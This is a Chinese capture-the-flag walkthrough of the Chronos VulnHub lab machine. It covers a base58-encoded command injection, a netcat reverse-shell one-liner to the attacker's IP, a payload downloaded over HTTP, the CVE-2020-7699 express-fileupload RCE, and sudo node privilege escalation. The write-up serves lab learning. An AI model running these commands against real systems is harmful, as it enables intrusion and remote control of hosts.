Chronos靶机渗透

admin 2022年7月8日22:22:58评论38 views字数 1742阅读5分48秒阅读模式

1.靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/chronos-1,735/
靶机介绍:
Description
Difficulty : medium
This works better with VirtualBox rather than VMware。
靶机IP:10.8.1.251

2.端口发现

扫描靶机信息,发现开放了22、25、80、110、8000端口
Chronos靶机渗透

3.WEB访问

访问web80和8000端口,都没有什么可利用的
Chronos靶机渗透Chronos靶机渗透查看源码,发现可疑的url,http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
Chronos靶机渗透将chronos.local添加到/etc/hosts下正常解析
Chronos靶机渗透再次访问80网站,4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL这一串应该是日期命令
Chronos靶机渗透http://chronos.local:8000/date?format=ls,将format后边随便加个ls,报错,非base58字符
Chronos靶机渗透那就用base解密一下4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL,日期命令
Chronos靶机渗透在web80端口利用burpsuite抓包,这里有2个包,一个是OPTIONS的包是80端口的先放过去,然后会有一个GET的向chronos.local:8000发送的请求包,发现User-Agent: Chronos和OPIIONS包的不同,执行pwd命令,用base58加密得到5JeBr9q,运行后成功返回当前目录为/opt/chronos。
Chronos靶机渗透查看下/etc/passwd,成功执行,只有一个imera用户
Chronos靶机渗透

4.反弹shell

利用nc 反弹shell,rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.1.169 1234 >/tmp/f经过base58加密得到2gxfnU3zJpKCbHYT5fzvYdqM2TL9waXViedX88Z8vgmKyvFDw7fCgTnFfh8qwVeVw6NkvRhjRzq3iDgmko7c7TeM5AksHZV6oe5,直接添加在format=之后运行就可以。
Chronos靶机渗透Chronos靶机渗透本机开启监听,执行后反弹成功。
Chronos靶机渗透python -c 'import pty;pty.spawn("/bin/bash")'升级下shell,在/opt目录又发现个chronos-v2目录,backend目录,依次查看
Chronos靶机渗透

5.express-fileupload RCE漏洞利用

express-fileupload文件上传,在本地监听了8080端口
Chronos靶机渗透查找express-fileupload漏洞,CVE-2020-7699,ejs模板引擎存在一个利用原型污染,进行RCE
Chronos靶机渗透在https://blog.p6.is/Real-World-JS-1/得到利用代码
Chronos靶机渗透已经得到靶机监听的是本地8080端口,更改一下代码,写入到shell.py
Chronos靶机渗透本地开启python -m http.server 80,靶机下载shell.py到/tmp下
Chronos靶机渗透本地开启监听,靶机给shell.py赋权,执行,成功反弹连接
Chronos靶机渗透Chronos靶机渗透

6.提权

进到/home/imera下,查看user.txt,得到flag:byBjaHJvbm.9zIHBlcm5hZWkgZmlsZSBtb3UK。
Chronos靶机渗透习惯性sudo -l,发现可以不需要密码执行/usr/local/bin/npm *和/usr/local/bin/node *
Chronos靶机渗透python -c 'import pty;pty.spawn("/bin/bash")'先升级下shell,尝试了npm无法提权,那就用node提权
Chronos靶机渗透直接执行sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})',得到root权限,拿到flag:YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK。

Chronos靶机渗透

本文作者:hailong86, 转载请注明来自FreeBuf.COM

原文始发于微信公众号(猫因的安全):Chronos靶机渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日22:22:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Chronos靶机渗透http://cn-sec.com/archives/1167936.html

发表评论

匿名网友 填写信息